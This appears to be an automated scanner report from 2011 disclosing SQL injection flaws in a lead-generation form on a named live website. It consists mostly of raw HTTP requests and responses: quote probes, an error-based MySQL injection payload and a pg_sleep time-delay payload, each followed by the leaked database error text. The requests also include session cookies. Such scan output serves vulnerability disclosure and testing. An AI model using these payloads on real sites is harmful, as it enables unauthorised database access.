1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the subcategoryId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005'&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005''&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa'&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa''&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The website parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the website parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code'' HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The zip parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the zip parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:31:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:23:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ea3h2adb0iur0ov55954r7kte7; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow'/bulo00/project_dynamic_page_updated.php?catId=30005&group=bulo00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&group=bulo00&template=3' OR prj.project_page_url = 'leadflow'/bulo0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
